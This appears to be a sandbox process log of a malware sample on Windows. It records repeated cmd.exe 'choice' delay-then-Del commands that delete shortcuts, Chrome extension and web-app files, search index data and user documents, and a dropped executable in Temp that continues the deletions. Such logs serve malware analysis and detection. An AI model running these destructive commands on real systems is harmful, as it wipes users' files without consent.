C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{021d2433-3ee9-4590-bdbe-3995198298a8}\0.0.filtertrie.intermediate.txt"3⤵PID:11000
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:220
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{021d2433-3ee9-4590-bdbe-3995198298a8}\0.1.filtertrie.intermediate.txt"3⤵PID:11024
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4116
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{021d2433-3ee9-4590-bdbe-3995198298a8}\0.2.filtertrie.intermediate.txt"3⤵PID:11040
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3740
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7ec85bca-bbb0-41ec-8dd1-40aa1ad30532}\0.0.filtertrie.intermediate.txt"3⤵PID:11060
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15852
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7ec85bca-bbb0-41ec-8dd1-40aa1ad30532}\0.1.filtertrie.intermediate.txt"3⤵PID:11088
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16072
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7ec85bca-bbb0-41ec-8dd1-40aa1ad30532}\0.2.filtertrie.intermediate.txt"3⤵PID:11100
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16372
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk"3⤵PID:11120
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15864
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk"3⤵PID:11136
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15640
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"3⤵PID:11156
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15648
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk"3⤵PID:11176
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15908
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk"3⤵PID:11192
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3604
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk"3⤵PID:11208
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15892
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk"3⤵PID:11228
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16264
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk"3⤵PID:9972
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16104
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Administrative Tools.lnk"3⤵PID:9964
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15884
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk"3⤵PID:10400
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16052
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk"3⤵PID:10468
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16168
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk"3⤵PID:10296
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16160
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk"3⤵PID:10452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16200
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk"3⤵PID:10572
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16348
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk"3⤵PID:11276
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2784
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk"3⤵PID:11532
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3756
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\128.png"3⤵PID:11548
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4440
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\offscreendocument.html"3⤵PID:11572
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1356
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5GKYR5FN\www.bing[1].xml"3⤵PID:11588
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:908
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\MS6XK32D\microsoft.windows[1].xml"3⤵PID:11600
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2284
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\craw_window.html"3⤵PID:11828
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2916
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png"3⤵PID:12016
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15692
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png"3⤵PID:12032
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:864
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png"3⤵PID:10752
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15700
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png"3⤵PID:11876
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16080
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png"3⤵PID:11936
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16016
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png"3⤵PID:12028
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16556
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png"3⤵PID:12296
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16132
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png"3⤵PID:12324
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16008
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png"3⤵PID:12336
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16684
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png"3⤵PID:12352
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16304
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png"3⤵PID:12508
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16464
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png"3⤵PID:12524
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16448
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png"3⤵PID:12536
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16456
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png"3⤵PID:12548
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16624
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png"3⤵PID:12560
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16676
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png"3⤵PID:12712
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1236
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png"3⤵PID:12728
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16404
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png"3⤵PID:12740
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16748
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png"3⤵PID:12752
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16796
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png"3⤵PID:12780
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16776
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png"3⤵PID:12792
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16616
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png"3⤵PID:12804
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16148
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png"3⤵PID:12816
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16472
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png"3⤵PID:12828
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16312
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png"3⤵PID:12844
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16788
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png"3⤵PID:12856
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16564
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png"3⤵PID:12868
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16808
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png"3⤵PID:12880
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16480
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png"3⤵PID:12964
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16712
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png"3⤵PID:12976
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16700
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png"3⤵PID:12992
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16692
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png"3⤵PID:13124
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16488
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png"3⤵PID:13136
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16328
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png"3⤵PID:13160
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16548
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png"3⤵PID:13180
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16756
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png"3⤵PID:12948
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16984
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png"3⤵PID:1828
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16228
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png"3⤵PID:13512
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16872
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png"3⤵PID:13532
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16220
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png"3⤵PID:13564
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16992
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png"3⤵PID:13584
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16892
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png"3⤵PID:13600
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:17012
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\128.png"3⤵PID:13636
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16944
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\192.png"3⤵PID:13648
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16996
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\256.png"3⤵PID:13668
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16636
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\32.png"3⤵PID:13892
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16540
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png"3⤵PID:13916
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16908
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\64.png"3⤵PID:13936
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16900
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\96.png"3⤵PID:14020
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16972
-
-
-
C:\Users\Admin\AppData\Local\Temp\kdmvcldlg.exe"C:\Users\Admin\AppData\Local\Temp\kdmvcldlg.exe"3⤵
- Executes dropped EXE
PID:3452 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Desktop.lnk"4⤵PID:17220
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17572
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Downloads.lnk"4⤵PID:17236
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17564
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\CompareRemove.html"4⤵PID:17272
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:18204
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\RevokeConvertTo.html"4⤵PID:17320
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\SplitUnregister.pptx"4⤵PID:17344
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17972
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1714135627.txt"4⤵PID:17368
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:18228
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"4⤵PID:4380
-
